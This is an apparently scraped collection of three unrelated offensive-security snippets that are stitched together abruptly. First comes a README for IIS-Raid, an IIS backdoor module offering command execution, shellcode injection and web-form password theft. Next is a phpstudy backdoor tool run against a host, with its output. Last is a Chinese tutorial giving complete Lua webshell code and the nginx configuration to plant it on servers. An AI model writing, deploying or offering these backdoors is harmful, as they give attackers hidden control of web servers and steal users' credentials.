IS Raid is a native IIS module that abuses the extendibility of IIS to backdoor the web server and carry out custom actions defined by an attacker.

Documentation

When installed, IIS-Raid will process every request and method, check if the X-Password header exists and compare it against the hardcoded value.
In case the value specified by the header doesn’t match the password, the request will continue normally without giving any indications of the backdoor.
If the header value matches the password, it will search for the communication header and extract its content. Additionally, it will base64 decode it, compare it against the predefined commands and process the instructions if any.

Four arguments are implemented on the script:
* –url : The URL that will be used to communicate with the backdoor. [Required]
* –password – The pre-shared password on the backdoor [Required]
* –header – The header to use for communication in case it was changed from the default one.
* –method – Change the method to either GET or POST.

Some of the features that are currently implemented in this version are:
* Interactive Command Execution – Allows the execution of commands and retrieve the output.
* Shellcode Injection – Extend functionality by injecting custom shellcode.
* Web Password Extractor – Extract passwords from Web Forms in clear-text.

Customisation

Before using and compiling the module, you need to change some of the options. To authenticate to the backdoor, the controller uses a pre-shared password with the module. As this is the only mechanism preventing someone else from accessing the backdoor, the default password must be changed.

Apart from the password, other backdoor options can be modified on the Functions.h file:

The COM_HEADER definition is the header name used to perform the communication between the backdoor and the controller.
The PASS_FILE definition is the file path where the extracted credentials from the web forms will be saved.
The PASSWORD definition is the password that will be used to authenticate to the backdoor.

More info

For more information refer to https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/

Demo Video

Screenshot

go run phpstudy_backdoor.go http://localhost/index.php "net user"

Active code page: 65001

User accounts for \\WIN-25US8G3F849

-------------------------------------------------------------------------------
Administrator            Guest                    
The command completed successfully.

https://github.com/Any3ite/phpstudy_backdoor

phpstudy后门事件详情：
https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

要求

安装有ngx_lua模块，在openresty和tengine中是默认安装了ngx_lua模块的。

我这里拿openresty举例，你可以在这里下载win平台打包好的。

步骤

找到conf/nginx.conf，在server块中添加路由

location = /a.php {  
    default_type 'text/plain';  
    content_by_lua_file lua/backdoor.lua;
}

然后创建lua/backdoor.lua脚本，你也可以创建在任意位置，不过要对应上文的content_by_lua_file字段

ngx.req.read_body()
local post_args = ngx.req.get_post_args()
local cmd = post_args["cmd"]
if cmd then
    f_ret = io.popen(cmd)
    local ret = f_ret:read("*a")
    ngx.say(string.format("%s", ret))
end

重载nginx

nginx -s reload

浏览器访问

文后

在实际的环境中，conf文件并不固定，你需要针对不同站点的配置文件去修改。

而location你可以更灵活一些，毕竟他能用正则表达式🙄，具体怎么用看你自己咯。

参考链接

1. https://github.com/netxfly/nginx_lua_security
2. https://xz.aliyun.com/t/6088

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。